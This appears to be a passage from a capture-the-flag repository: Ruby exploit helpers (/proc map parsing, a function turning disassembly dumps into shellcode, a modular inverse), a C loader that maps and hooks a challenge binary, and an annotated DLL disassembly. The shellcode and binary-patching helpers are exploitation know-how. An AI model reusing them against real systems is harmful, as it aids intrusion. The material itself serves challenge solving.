| end 133 | rescue 134 | STDOUT.puts $! 135 | STDOUT.puts $!.backtrace 136 | STDOUT.puts '' 137 | STDOUT.puts 'output:' 138 | STDOUT.puts self.read 139 | end 140 | end 141 | end 142 | 143 | def proc_map(pid) 144 | if pid.is_a?(IO) 145 | IO.select([pid], [], [], 0.03) 146 | return proc_map(pid.pid) 147 | end 148 | 149 | File.read("/proc/#{pid}/maps") 150 | end 151 | 152 | class ProcMap 153 | def initialize(pid) 154 | @maps = [] 155 | anon_id = 0 156 | proc_map(pid).each_line do |line| 157 | toks = line.split 158 | name = toks[5] 159 | if !name 160 | name = "*anonymous_#{anon_id}*" 161 | anon_id += 1 162 | end 163 | 164 | range = toks[0].split('-').map(&:hex) 165 | range = Range.new(range[0], range[1], true) 166 | prot = toks[1] 167 | @maps << [name, range, prot] 168 | end 169 | end 170 | 171 | def get_range(reg) 172 | first = nil 173 | last = nil 174 | @maps.each do |name, range, prot| 175 | if reg =~ name 176 | if !first || first > range.first 177 | first = range.first 178 | end 179 | if !last || last < range.last 180 | last = range.last 181 | end 182 | end 183 | end 184 | 185 | if !first || !last 186 | raise "Missing first or last: #{first} - #{last}" 187 | end 188 | 189 | Range.new(first, last, true) 190 | end 191 | end 192 | 193 | class Range 194 | def addr_str 195 | '%x-%x' % [first, last] 196 | end 197 | end 198 | 199 | def shellcode_from_dump(dump) 200 | dump = dump.gsub(/^\s*\h+:/, '') 201 | sc = '' 202 | dump.scan(/^\s*((\h{2}\s)+)/) do 203 | sc += $1.split.map{|h|h.hex.chr} * '' 204 | end 205 | 206 | if i = sc.index("\0") 207 | STDERR.puts "WARNING: NULL in shellcode at #{i}" 208 | end 209 | if i = sc.index("\n") 210 | STDERR.puts "WARNING: linebreak in shellcode at #{i}" 211 | end 212 | STDERR.puts "shellcode size: #{sc.size}" 213 | 214 | sc 215 | end 216 | 217 | if ARGV[0] == '-p' 218 | $prod = true 219 | ARGV.shift 220 | end 221 | if ARGV[0] == '-g' 222 | $gdb = true 223 | ARGV.shift 224 | end 225 | 226 | # from http://rosettacode.org/wiki/Modular_inverse#Ruby 227 | 228 | def extended_gcd(a, b) 229 | last_remainder, remainder = a.abs, b.abs 230 | x, last_x, y, last_y = 0, 1, 1, 0 231 | while remainder != 0 232 | last_remainder, (quotient, remainder) = remainder, last_remainder.divmod(remainder) 233 | x, last_x = last_x - quotient*x, x 234 | y, last_y = last_y - quotient*y, y 235 | end 236 | 237 | return last_remainder, last_x * (a < 0 ? -1 : 1) 238 | end 239 | 240 | def invmod(e, et) 241 | g, x = extended_gcd(e, et) 242 | if g != 1 243 | raise 'Teh maths are broken!' 244 | end 245 | x % et 246 | end 247 | -------------------------------------------------------------------------------- /sh.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | //#define fprintf(...) 17 | #define LOG(...) fprintf(stderr, __VA_ARGS__) 18 | //#define LOG(...) 19 | 20 | typedef long long (*mm_fn)(long long, long long); 21 | mm_fn mm = (mm_fn)0x080487ec; 22 | 23 | long long mm_wrap(long long a, long long b) { 24 | printf("mm: %lld %lld\n", a, b); 25 | return mm(a, b); 26 | } 27 | 28 | void undefined() { 29 | fprintf(stderr, "undefined function is called\n"); 30 | abort(); 31 | } 32 | 33 | int main(int argc, char* argv[]) { 34 | int i; 35 | int fd, len; 36 | char* elf; 37 | int entry, phoff, phnum; 38 | int* ph; 39 | 40 | #if 0 41 | if (argc < 2) 42 | error("Usage: el "); 43 | LOG("loading %s\n", argv[1]); 44 | #endif 45 | fd = open("simple_hash", O_RDONLY); 46 | if (fd < 0) 47 | error("Usage: el "); 48 | len = lseek(fd, 0, SEEK_END); 49 | elf = (char*)malloc(len); 50 | lseek(fd, 0, SEEK_SET); 51 | read(fd, elf, len); 52 | 53 | if (*(int*)elf != 0x464c457f) 54 | error("not elf"); 55 | if (*(int*)(elf+16) != 0x30002) 56 | error("not i386 exec"); 57 | 58 | entry = *(int*)(elf+24); 59 | phoff = *(int*)(elf+28); 60 | phnum = *(int*)(elf+42); 61 | LOG("%x %x %x\n", entry, phoff, phnum); 62 | 63 | ph = (int*)(elf + phoff); 64 | for (i = 0; i < phnum >> 16; i++) { 65 | int poff, paddr, pfsize, psize, pafsize, pflag /*, palign */; 66 | poff = ph[1]; 67 | paddr = ph[2]; 68 | pfsize = ph[4]; 69 | psize = ph[5]; 70 | pflag = ph[6]; 71 | /*palign = ph[7];*/ 72 | switch (ph[0]) { 73 | case 1: { 74 | int prot = 0; 75 | if (pflag & 1) 76 | prot |= PROT_EXEC; 77 | if (pflag & 2) 78 | prot |= PROT_WRITE; 79 | if (pflag & 4) 80 | prot |= PROT_READ; 81 | if (prot & PROT_EXEC) { 82 | prot |= PROT_WRITE; 83 | } 84 | 85 | psize += paddr & 0xfff; 86 | pfsize += paddr & 0xfff; 87 | poff -= paddr & 0xfff; 88 | paddr &= ~0xfff; 89 | pafsize = (pfsize + 0xfff) & ~0xfff; 90 | psize = (psize + 0xfff) & ~0xfff; 91 | LOG("PT_LOAD size=%d fsize=%d flag=%d addr=%x prot=%d poff=%d\n", 92 | psize, pafsize, pflag, paddr, prot, poff); 93 | if (mmap((void*)paddr, pafsize, prot, MAP_FILE|MAP_PRIVATE|MAP_FIXED, 94 | fd, poff) == MAP_FAILED) { 95 | error("mmap(file)"); 96 | } 97 | if ((prot & PROT_WRITE)) { 98 | LOG("%p\n", (char*)paddr); 99 | for (; pfsize < pafsize; pfsize++) { 100 | char* p = (char*)paddr; 101 | p[pfsize] = 0; 102 | } 103 | if (pfsize != psize) { 104 | if (mmap((void*)(paddr + pfsize), 105 | psize - pfsize, prot, MAP_ANON|MAP_PRIVATE, 106 | -1, 0) == MAP_FAILED) { 107 | error("mmap(anon)"); 108 | } 109 | } 110 | } 111 | 112 | break; 113 | } 114 | case 2: { 115 | char* dyn; 116 | char* dstr = NULL; 117 | char* dsym = NULL; 118 | char* rel = NULL; 119 | char* pltrel = NULL; 120 | int relsz, relent, pltrelsz = 0; 121 | int needed[999] = {}, *neededp = needed; 122 | puts("PT_DYNAMIC"); 123 | dyn = elf + poff; 124 | for (;;) { 125 | short dtag = *(short*)dyn; 126 | int dval = *(int*)(dyn + 4); 127 | dyn += 8; 128 | if (dtag == 0) 129 | break; 130 | switch (dtag) { 131 | case 1: { /* DT_NEEDED */ 132 | *neededp++ = dval; 133 | } 134 | case 2: { 135 | pltrelsz = dval; 136 | LOG("pltrelsz: %d\n", pltrelsz); 137 | break; 138 | } 139 | case 5: { 140 | dstr = (char*)dval; 141 | LOG("dstr: %p %s\n", dstr, dstr+1); 142 | break; 143 | } 144 | case 6: { 145 | dsym = (char*)dval; 146 | LOG("dsym: %p\n", dsym); 147 | break; 148 | } 149 | case 17: { 150 | rel = (char*)dval; 151 | LOG("rel: %p\n", rel); 152 | break; 153 | } 154 | case 18: { 155 | relsz = dval; 156 | LOG("relsz: %d\n", relsz); 157 | break; 158 | } 159 | case 19: { 160 | relent = dval; 161 | LOG("relent: %d\n", relent); 162 | break; 163 | } 164 | case 20: { 165 | pltrel = (char*)dval; 166 | LOG("pltrel: %p\n", pltrel); 167 | break; 168 | } 169 | default: 170 | LOG("unknown DYN %d %d\n", dtag, dval); 171 | } 172 | } 173 | if (!dsym || !dstr) { 174 | error("no dsym or dstr"); 175 | } 176 | 177 | for (neededp = needed; *neededp; neededp++) { 178 | LOG("needed: %s\n", dstr + *neededp); 179 | dlopen(dstr + *neededp, RTLD_NOW | RTLD_GLOBAL); 180 | } 181 | 182 | { 183 | int i, j; 184 | for (j = 0; j < 2; j++) { 185 | for (i = 0; i < relsz; rel += relent, i += relent) { 186 | int* addr = *(int**)rel; 187 | int info = *(int*)(rel + 4); 188 | int sym = info >> 8; 189 | int type = info & 0xff; 190 | 191 | int* ds = (int*)(dsym + 16 * sym); 192 | char* sname = dstr + *ds; 193 | void* val=0; 194 | int k; 195 | #if 0 196 | for(k=0;T[k].n;k++){ 197 | if(!strcmp(sname,T[k].n)){ 198 | val = T[k].f; 199 | break; 200 | } 201 | } 202 | #endif 203 | if(!val){ 204 | if (!strcmp(sname,"stdout")) 205 | val = &stdout; 206 | else if (!strcmp(sname,"_Stdout")) 207 | val = stdout; 208 | else if (!strcmp(sname,"stderr")) 209 | val = &stderr; 210 | else if (!strcmp(sname,"_Stderr")) 211 | val = stderr; 212 | /* 213 | else if (!strcmp(sname, "__environ")) 214 | val = &environ; 215 | */ 216 | else 217 | val = dlsym(RTLD_DEFAULT, sname); 218 | } 219 | 220 | LOG("%srel: %p %s(%d) %d => %p\n", 221 | j ? "plt" : "", (void*)addr, sname, sym, type, val); 222 | 223 | if (!val) { 224 | val = (void*)&undefined; 225 | } 226 | 227 | switch (type) { 228 | case 1: { 229 | *addr += (int)val; 230 | } 231 | case 5: { 232 | if (val) { 233 | *addr = *(int*)val; 234 | } else { 235 | fprintf(stderr, "undefined: %s\n", sname); 236 | //abort(); 237 | } 238 | } 239 | case 6: { 240 | if (val) { 241 | *addr = (int)val; 242 | } else { 243 | fprintf(stderr, "undefined data %s\n", sname); 244 | } 245 | break; 246 | } 247 | case 7: { 248 | if (val) { 249 | *addr = (int)val; 250 | } else { 251 | *addr = (int)&undefined; 252 | } 253 | break; 254 | } 255 | } 256 | } 257 | 258 | if ((int)pltrel != 17) { 259 | rel = pltrel; 260 | } 261 | relsz = pltrelsz; 262 | } 263 | } 264 | 265 | break; 266 | } 267 | default: 268 | fprintf(stderr, "unknown PT %d\n", ph[0]); 269 | } 270 | ph += 8; 271 | } 272 | 273 | //g_argc = argc-1; 274 | //g_argv = argv+1; 275 | 276 | fprintf(stderr, "start!: %s %x\n", argv[1], entry); 277 | 278 | #define TEST(a, b) printf("%lld*%lld=%lld (%lld)\n", a, b, mm(a, b), a * b % 0x38d7ea4c68025LL) 279 | TEST(1LL, 2LL); 280 | TEST(0xdeaddeadULL, 0xdeaddeadULL); 281 | 282 | *(char**)(0x8048963+1) = (char*)mm_wrap - (0x8048963 + 5); 283 | 284 | char* str = (char*)0x80491a0; 285 | str[0] = 'X'; 286 | str[1] = 'X'; 287 | str[2] = 0; 288 | long long (*calc_hash)() = (long long (*)())0x08048927; 289 | printf("%lld\n", calc_hash()); 290 | 291 | //run((void*)entry); 292 | return 0; 293 | } 294 | -------------------------------------------------------------------------------- /howtouse.dmp: -------------------------------------------------------------------------------- 1 | 2 | howtouse.dll: file format pei-i386 3 | 4 | 5 | Disassembly of section .text: 6 | 7 | 10001000 <.text>: 8 | 10001000: b8 01 00 00 00 mov $0x1,%eax 9 | 10001005: c2 0c 00 ret $0xc 10 | 10001008: cc int3 11 | 10001009: cc int3 12 | 1000100a: cc int3 13 | 1000100b: cc int3 14 | 1000100c: cc int3 15 | 1000100d: cc int3 16 | 1000100e: cc int3 17 | 1000100f: cc int3 18 | 10001010: b8 61 00 00 00 mov $0x61,%eax 19 | 10001015: c3 ret 20 | 10001016: cc int3 21 | 10001017: cc int3 22 | 10001018: cc int3 23 | 10001019: cc int3 24 | 1000101a: cc int3 25 | 1000101b: cc int3 26 | 1000101c: cc int3 27 | 1000101d: cc int3 28 | 1000101e: cc int3 29 | 1000101f: cc int3 30 | 10001020: b8 62 00 00 00 mov $0x62,%eax 31 | 10001025: c3 ret 32 | 10001026: cc int3 33 | 10001027: cc int3 34 | 10001028: cc int3 35 | 10001029: cc int3 36 | 1000102a: cc int3 37 | 1000102b: cc int3 38 | 1000102c: cc int3 39 | 1000102d: cc int3 40 | 1000102e: cc int3 41 | 1000102f: cc int3 42 | 10001030: b8 63 00 00 00 mov $0x63,%eax 43 | 10001035: c3 ret 44 | 10001036: cc int3 45 | 10001037: cc int3 46 | 10001038: cc int3 47 | 10001039: cc int3 48 | 1000103a: cc int3 49 | 1000103b: cc int3 50 | 1000103c: cc int3 51 | 1000103d: cc int3 52 | 1000103e: cc int3 53 | 1000103f: cc int3 54 | 10001040: b8 64 00 00 00 mov $0x64,%eax 55 | 10001045: c3 ret 56 | 10001046: cc int3 57 | 10001047: cc int3 58 | 10001048: cc int3 59 | 10001049: cc int3 60 | 1000104a: cc int3 61 | 1000104b: cc int3 62 | 1000104c: cc int3 63 | 1000104d: cc int3 64 | 1000104e: cc int3 65 | 1000104f: cc int3 66 | 10001050: b8 65 00 00 00 mov $0x65,%eax 67 | 10001055: c3 ret 68 | 10001056: cc int3 69 | 10001057: cc int3 70 | 10001058: cc int3 71 | 10001059: cc int3 72 | 1000105a: cc int3 73 | 1000105b: cc int3 74 | 1000105c: cc int3 75 | 1000105d: cc int3 76 | 1000105e: cc int3 77 | 1000105f: cc int3 78 | 10001060: b8 66 00 00 00 mov $0x66,%eax 79 | 10001065: c3 ret 80 | 10001066: cc int3 81 | 10001067: cc int3 82 | 10001068: cc int3 83 | 10001069: cc int3 84 | 1000106a: cc int3 85 | 1000106b: cc int3 86 | 1000106c: cc int3 87 | 1000106d: cc int3 88 | 1000106e: cc int3 89 | 1000106f: cc int3 90 | 10001070: b8 41 00 00 00 mov $0x41,%eax 91 | 10001075: c3 ret 92 | 10001076: cc int3 93 | 10001077: cc int3 94 | 10001078: cc int3 95 | 10001079: cc int3 96 | 1000107a: cc int3 97 | 1000107b: cc int3 98 | 1000107c: cc int3 99 | 1000107d: cc int3 100 | 1000107e: cc int3 101 | 1000107f: cc int3 102 | 10001080: b8 4d 00 00 00 mov $0x4d,%eax 103 | 10001085: c3 ret 104 | 10001086: cc int3 105 | 10001087: cc int3 106 | 10001088: cc int3 107 | 10001089: cc int3 108 | 1000108a: cc int3 109 | 1000108b: cc int3 110 | 1000108c: cc int3 111 | 1000108d: cc int3 112 | 1000108e: cc int3 113 | 1000108f: cc int3 114 | 10001090: b8 30 00 00 00 mov $0x30,%eax 115 | 10001095: c3 ret 116 | 10001096: cc int3 117 | 10001097: cc int3 118 | 10001098: cc int3 119 | 10001099: cc int3 120 | 1000109a: cc int3 121 | 1000109b: cc int3 122 | 1000109c: cc int3 123 | 1000109d: cc int3 124 | 1000109e: cc int3 125 | 1000109f: cc int3 126 | 100010a0: b8 31 00 00 00 mov $0x31,%eax 127 | 100010a5: c3 ret 128 | 100010a6: cc int3 129 | 100010a7: cc int3 130 | 100010a8: cc int3 131 | 100010a9: cc int3 132 | 100010aa: cc int3 133 | 100010ab: cc int3 134 | 100010ac: cc int3 135 | 100010ad: cc int3 136 | 100010ae: cc int3 137 | 100010af: cc int3 138 | 100010b0: b8 32 00 00 00 mov $0x32,%eax 139 | 100010b5: c3 ret 140 | 100010b6: cc int3 141 | 100010b7: cc int3 142 | 100010b8: cc int3 143 | 100010b9: cc int3 144 | 100010ba: cc int3 145 | 100010bb: cc int3 146 | 100010bc: cc int3 147 | 100010bd: cc int3 148 | 100010be: cc int3 149 | 100010bf: cc int3 150 | 100010c0: b8 33 00 00 00 mov $0x33,%eax 151 | 100010c5: c3 ret 152 | 100010c6: cc int3 153 | 100010c7: cc int3 154 | 100010c8: cc int3 155 | 100010c9: cc int3 156 | 100010ca: cc int3 157 | 100010cb: cc int3 158 | 100010cc: cc int3 159 | 100010cd: cc int3 160 | 100010ce: cc int3 161 | 100010cf: cc int3 162 | 100010d0: b8 34 00 00 00 mov $0x34,%eax 163 | 100010d5: c3 ret 164 | 100010d6: cc int3 165 | 100010d7: cc int3 166 | 100010d8: cc int3 167 | 100010d9: cc int3 168 | 100010da: cc int3 169 | 100010db: cc int3 170 | 100010dc: cc int3 171 | 100010dd: cc int3 172 | 100010de: cc int3 173 | 100010df: cc int3 174 | 100010e0: b8 37 00 00 00 mov $0x37,%eax 175 | 100010e5: c3 ret 176 | 100010e6: cc int3 177 | 100010e7: cc int3 178 | 100010e8: cc int3 179 | 100010e9: cc int3 180 | 100010ea: cc int3 181 | 100010eb: cc int3 182 | 100010ec: cc int3 183 | 100010ed: cc int3 184 | 100010ee: cc int3 185 | 100010ef: cc int3 186 | 100010f0: b8 38 00 00 00 mov $0x38,%eax 187 | 100010f5: c3 ret 188 | 100010f6: cc int3 189 | 100010f7: cc int3 190 | 100010f8: cc int3 191 | 100010f9: cc int3 192 | 100010fa: cc int3 193 | 100010fb: cc int3 194 | 100010fc: cc int3 195 | 100010fd: cc int3 196 | 100010fe: cc int3 197 | 100010ff: cc int3 198 | 10001100: b8 39 00 00 00 mov $0x39,%eax 199 | 10001105: c3 ret 200 | 10001106: cc int3 201 | 10001107: cc int3 202 | 10001108: cc int3 203 | 10001109: cc int3 204 | 1000110a: cc int3 205 | 1000110b: cc int3 206 | 1000110c: cc int3 207 | 1000110d: cc int3 208 | 1000110e: cc int3 209 | 1000110f: cc int3 210 | 10001110: b8 7b 00 00 00 mov $0x7b,%eax 211 | 10001115: c3 ret 212 | 10001116: cc int3 213 | 10001117: cc int3 214 | 10001118: cc int3 215 | 10001119: cc int3 216 | 1000111a: cc int3 217 | 1000111b: cc int3 218 | 1000111c: cc int3 219 | 1000111d: cc int3 220 | 1000111e: cc int3 221 | 1000111f: cc int3 222 | 10001120: b8 7d 00 00 00 mov $0x7d,%eax 223 | 10001125: c3 ret 224 | 10001126: cc int3 225 | 10001127: cc int3 226 | 10001128: cc int3 227 | 10001129: cc int3 228 | 1000112a: cc int3 229 | 1000112b: cc int3 230 | 1000112c: cc int3 231 | 1000112d: cc int3 232 | 1000112e: cc int3 233 | 1000112f: cc int3 234 | 10001130: 81 ec b4 00 00 00 sub $0xb4,%esp 235 | 10001136: b8 80 10 00 10 mov $0x10001080,%eax 236 | 1000113b: 89 04 24 mov %eax,(%esp) 237 | 1000113e: 89 44 24 04 mov %eax,0x4(%esp) 238 | 10001142: b8 90 10 00 10 mov $0x10001090,%eax 239 | 10001147: 89 44 24 24 mov %eax,0x24(%esp) 240 | 1000114b: 89 44 24 30 mov %eax,0x30(%esp) 241 | 1000114f: 89 44 24 34 mov %eax,0x34(%esp) 242 | 10001153: 56 push %esi 243 | 10001154: b8 a0 10 00 10 mov $0x100010a0,%eax # 1 244 | 10001159: ba 30 10 00 10 mov $0x10001030,%edx # c 245 | 1000115e: 57 push %edi 246 | 1000115f: bf e0 10 00 10 mov $0x100010e0,%edi # 7 247 | 10001164: b9 00 11 00 10 mov $0x10001100,%ecx # 9 248 | 10001169: 89 44 24 40 mov %eax,0x40(%esp) 249 | 1000116d: 89 44 24 54 mov %eax,0x54(%esp) 250 | 10001171: b8 50 10 00 10 mov $0x10001050,%eax # e 251 | 10001176: be 40 10 00 10 mov $0x10001040,%esi # d 252 | 1000117b: 89 54 24 1c mov %edx,0x1c(%esp) # c 253 | 1000117f: 89 54 24 30 mov %edx,0x30(%esp) 254 | 10001183: 89 54 24 48 mov %edx,0x48(%esp) 255 | 10001187: ba f0 10 00 10 mov $0x100010f0,%edx 256 | 1000118c: 89 7c 24 20 mov %edi,0x20(%esp) 257 | 10001190: 89 7c 24 50 mov %edi,0x50(%esp) 258 | 10001194: 89 7c 24 64 mov %edi,0x64(%esp) 259 | 10001198: 89 44 24 7c mov %eax,0x7c(%esp) 260 | 1000119c: 89 84 24 80 00 00 00 mov %eax,0x80(%esp) 261 | 100011a3: 89 bc 24 84 00 00 00 mov %edi,0x84(%esp) 262 | 100011aa: 89 84 24 88 00 00 00 mov %eax,0x88(%esp) 263 | 100011b1: 89 84 24 98 00 00 00 mov %eax,0x98(%esp) 264 | 100011b8: 89 84 24 ac 00 00 00 mov %eax,0xac(%esp) 265 | 100011bf: 8b 84 24 c0 00 00 00 mov 0xc0(%esp),%eax 266 | 100011c6: 89 74 24 24 mov %esi,0x24(%esp) 267 | 100011ca: 89 74 24 68 mov %esi,0x68(%esp) 268 | 100011ce: 89 74 24 74 mov %esi,0x74(%esp) 269 | 100011d2: 89 b4 24 b0 00 00 00 mov %esi,0xb0(%esp) 270 | 100011d9: 5f pop %edi 271 | 100011da: c7 44 24 0c 70 10 00 movl $0x10001070,0xc(%esp) 272 | 100011e1: 10 273 | 100011e2: c7 44 24 10 10 11 00 movl $0x10001110,0x10(%esp) 274 | 100011e9: 10 275 | 100011ea: c7 44 24 14 60 10 00 movl $0x10001060,0x14(%esp) 276 | 100011f1: 10 277 | 100011f2: 89 4c 24 24 mov %ecx,0x24(%esp) 278 | 100011f6: c7 44 24 30 10 10 00 movl $0x10001010,0x30(%esp) 279 | 100011fd: 10 280 | 100011fe: c7 44 24 40 60 10 00 movl $0x10001060,0x40(%esp) 281 | 10001205: 10 282 | 10001206: 89 54 24 48 mov %edx,0x48(%esp) 283 | 1000120a: c7 44 24 54 b0 10 00 movl $0x100010b0,0x54(%esp) 284 | 10001211: 10 285 | 10001212: c7 44 24 58 d0 10 00 movl $0x100010d0,0x58(%esp) 286 | 10001219: 10 287 | 1000121a: 89 4c 24 5c mov %ecx,0x5c(%esp) 288 | 1000121e: 89 54 24 68 mov %edx,0x68(%esp) 289 | 10001222: 89 54 24 6c mov %edx,0x6c(%esp) 290 | 10001226: 89 4c 24 74 mov %ecx,0x74(%esp) 291 | 1000122a: c7 84 24 88 00 00 00 movl $0x10001060,0x88(%esp) 292 | 10001231: 60 10 00 10 293 | 10001235: c7 84 24 8c 00 00 00 movl $0x10001010,0x8c(%esp) 294 | 1000123c: 10 10 00 10 295 | 10001240: 89 8c 24 90 00 00 00 mov %ecx,0x90(%esp) 296 | 10001247: 89 8c 24 98 00 00 00 mov %ecx,0x98(%esp) 297 | 1000124e: c7 84 24 9c 00 00 00 movl $0x10001020,0x9c(%esp) 298 | 10001255: 20 10 00 10 299 | 10001259: c7 84 24 a0 00 00 00 movl $0x100010c0,0xa0(%esp) 300 | 10001260: c0 10 00 10 301 | 10001264: c7 84 24 a4 00 00 00 movl $0x100010b0,0xa4(%esp) 302 | 1000126b: b0 10 00 10 303 | 1000126f: 89 94 24 b0 00 00 00 mov %edx,0xb0(%esp) 304 | 10001276: c7 84 24 b4 00 00 00 movl $0x10001120,0xb4(%esp) 305 | 1000127d: 20 11 00 10 306 | 10001281: 8b 4c 84 04 mov 0x4(%esp,%eax,4),%ecx 307 | 10001285: 5e pop %esi 308 | 10001286: 81 c4 b4 00 00 00 add $0xb4,%esp 309 | 1000128c: ff e1 jmp *%ecx 310 | 1000128e: 3b 0d 00 30 00 10 cmp 0x10003000,%ecx 311 | 10001294: 75 02 jne 0x10001298 312 | 10001296: f3 c3 repz ret 313 | 10001298: e9 ae 03 00 00 jmp 0x1000164b 314 | 1000129d: 8b ff mov %edi,%edi 315 | 1000129f: 56 push %esi 316 | 100012a0: 68 80 00 00 00 push $0x80 317 | 100012a5: ff 15 70 20 00 10 call *0x10002070 318 | 100012ab: 8b f0 mov %eax,%esi 319 | 100012ad: 56 push %esi 320 | 100012ae: ff 15 78 20 00 10 call *0x10002078 321 | 100012b4: 59 pop %ecx 322 | 100012b5: 59 pop %ecx 323 | 100012b6: a3 5c 33 00 10 mov %eax,0x1000335c 324 | 100012bb: a3 58 33 00 10 mov %eax,0x10003358 325 | 100012c0: 85 f6 test %esi,%esi 326 | 100012c2: 75 05 jne 0x100012c9 327 | 100012c4: 33 c0 xor %eax,%eax 328 | 100012c6: 40 inc %eax 329 | 100012c7: 5e pop %esi 330 | 100012c8: c3 ret 331 | 100012c9: 83 26 00 andl $0x0,(%esi) 332 | 100012cc: e8 48 05 00 00 call 0x10001819 333 | 100012d1: 68 3f 18 00 10 push $0x1000183f 334 | 100012d6: e8 27 05 00 00 call 0x10001802 335 | 100012db: c7 04 24 51 17 00 10 movl $0x10001751,(%esp) 336 | 100012e2: e8 1b 05 00 00 call 0x10001802 337 | 100012e7: 59 pop %ecx 338 | 100012e8: 33 c0 xor %eax,%eax 339 | 100012ea: 5e pop %esi 340 | 100012eb: c3 ret 341 | 100012ec: 8b ff mov %edi,%edi 342 | 100012ee: 55 push %ebp 343 | 100012ef: 8b ec mov %esp,%ebp 344 | 100012f1: 51 push %ecx 345 | 100012f2: 51 push %ecx 346 | 100012f3: 33 c0 xor %eax,%eax 347 | 100012f5: 39 45 0c cmp %eax,0xc(%ebp) 348 | 100012f8: 75 0e jne 0x10001308 349 | 100012fa: 39 05 10 30 00 10 cmp %eax,0x10003010 350 | 10001300: 7e 3c jle 0x1000133e 351 | 10001302: ff 0d 10 30 00 10 decl 0x10003010 352 | 10001308: 83 7d 0c 01 cmpl $0x1,0xc(%ebp) 353 | 1000130c: 8b 0d 54 20 00 10 mov 0x10002054,%ecx 354 | 10001312: 8b 09 mov (%ecx),%ecx 355 | 10001314: 53 push %ebx 356 | 10001315: 56 push %esi 357 | 10001316: 57 push %edi 358 | 10001317: 89 0d 4c 33 00 10 mov %ecx,0x1000334c 359 | 1000131d: 0f 85 d4 00 00 00 jne 0x100013f7 360 | 10001323: 64 8b 0d 18 00 00 00 mov %fs:0x18,%ecx 361 | 1000132a: 8b 79 04 mov 0x4(%ecx),%edi 362 | 1000132d: 8b 35 24 20 00 10 mov 0x10002024,%esi 363 | 10001333: 89 45 0c mov %eax,0xc(%ebp) 364 | 10001336: 50 push %eax 365 | 10001337: bb 54 33 00 10 mov $0x10003354,%ebx 366 | 1000133c: eb 18 jmp 0x10001356 367 | 1000133e: 33 c0 xor %eax,%eax 368 | 10001340: e9 c9 01 00 00 jmp 0x1000150e 369 | 10001345: 3b c7 cmp %edi,%eax 370 | 10001347: 74 17 je 0x10001360 371 | 10001349: 68 e8 03 00 00 push $0x3e8 372 | 1000134e: ff 15 28 20 00 10 call *0x10002028 373 | 10001354: 6a 00 push $0x0 374 | 10001356: 57 push %edi 375 | 10001357: 53 push %ebx 376 | 10001358: ff d6 call *%esi 377 | 1000135a: 85 c0 test %eax,%eax 378 | 1000135c: 75 e7 jne 0x10001345 379 | 1000135e: eb 07 jmp 0x10001367 380 | 10001360: c7 45 0c 01 00 00 00 movl $0x1,0xc(%ebp) 381 | 10001367: a1 50 33 00 10 mov 0x10003350,%eax 382 | 1000136c: 6a 02 push $0x2 383 | 1000136e: 5e pop %esi 384 | 1000136f: 85 c0 test %eax,%eax 385 | 10001371: 74 09 je 0x1000137c 386 | 10001373: 6a 1f push $0x1f 387 | 10001375: e8 50 06 00 00 call 0x100019ca 388 | 1000137a: eb 3c jmp 0x100013b8 389 | 1000137c: 68 90 20 00 10 push $0x10002090 390 | 10001381: 68 88 20 00 10 push $0x10002088 391 | 10001386: c7 05 50 33 00 10 01 movl $0x1,0x10003350 392 | 1000138d: 00 00 00 393 | 10001390: e8 2f 06 00 00 call 0x100019c4 394 | 10001395: 59 pop %ecx 395 | 10001396: 59 pop %ecx 396 | 10001397: 85 c0 test %eax,%eax 397 | 10001399: 74 07 je 0x100013a2 398 | 1000139b: 33 c0 xor %eax,%eax 399 | 1000139d: e9 69 01 00 00 jmp 0x1000150b 400 | 100013a2: 68 84 20 00 10 push $0x10002084 401 | 100013a7: 68 80 20 00 10 push $0x10002080 402 | 100013ac: e8 0d 06 00 00 call 0x100019be 403 | 100013b1: 59 pop %ecx 404 | 100013b2: 89 35 50 33 00 10 mov %esi,0x10003350 405 | 100013b8: 33 ff xor %edi,%edi 406 | 100013ba: 59 pop %ecx 407 | 100013bb: 39 7d 0c cmp %edi,0xc(%ebp) 408 | 100013be: 75 08 jne 0x100013c8 409 | 100013c0: 57 push %edi 410 | 100013c1: 53 push %ebx 411 | 100013c2: ff 15 2c 20 00 10 call *0x1000202c 412 | 100013c8: 39 3d 60 33 00 10 cmp %edi,0x10003360 413 | 100013ce: 74 1c je 0x100013ec 414 | 100013d0: 68 60 33 00 10 push $0x10003360 415 | 100013d5: e8 26 05 00 00 call 0x10001900 416 | 100013da: 59 pop %ecx 417 | 100013db: 85 c0 test %eax,%eax 418 | 100013dd: 74 0d je 0x100013ec 419 | 100013df: ff 75 10 pushl 0x10(%ebp) 420 | 100013e2: 56 push %esi 421 | 100013e3: ff 75 08 pushl 0x8(%ebp) 422 | 100013e6: ff 15 60 33 00 10 call *0x10003360 423 | 100013ec: ff 05 10 30 00 10 incl 0x10003010 424 | 100013f2: e9 11 01 00 00 jmp 0x10001508 425 | 100013f7: 39 45 0c cmp %eax,0xc(%ebp) 426 | 100013fa: 0f 85 08 01 00 00 jne 0x10001508 427 | 10001400: 64 a1 18 00 00 00 mov %fs:0x18,%eax 428 | 10001406: 8b 78 04 mov 0x4(%eax),%edi 429 | 10001409: 83 65 fc 00 andl $0x0,-0x4(%ebp) 430 | 1000140d: 8b 35 24 20 00 10 mov 0x10002024,%esi 431 | 10001413: bb 54 33 00 10 mov $0x10003354,%ebx 432 | 10001418: eb 0f jmp 0x10001429 433 | 1000141a: 3b c7 cmp %edi,%eax 434 | 1000141c: 74 17 je 0x10001435 435 | 1000141e: 68 e8 03 00 00 push $0x3e8 436 | 10001423: ff 15 28 20 00 10 call *0x10002028 437 | 10001429: 6a 00 push $0x0 438 | 1000142b: 57 push %edi 439 | 1000142c: 53 push %ebx 440 | 1000142d: ff d6 call *%esi 441 | 1000142f: 85 c0 test %eax,%eax 442 | 10001431: 75 e7 jne 0x1000141a 443 | 10001433: eb 07 jmp 0x1000143c 444 | 10001435: c7 45 fc 01 00 00 00 movl $0x1,-0x4(%ebp) 445 | 1000143c: a1 50 33 00 10 mov 0x10003350,%eax 446 | 10001441: 83 f8 02 cmp $0x2,%eax 447 | 10001444: 74 0d je 0x10001453 448 | 10001446: 6a 1f push $0x1f 449 | 10001448: e8 7d 05 00 00 call 0x100019ca 450 | 1000144d: 59 pop %ecx 451 | 1000144e: e9 b5 00 00 00 jmp 0x10001508 452 | 10001453: ff 35 5c 33 00 10 pushl 0x1000335c 453 | 10001459: 8b 35 64 20 00 10 mov 0x10002064,%esi 454 | 1000145f: ff d6 call *%esi 455 | 10001461: 59 pop %ecx 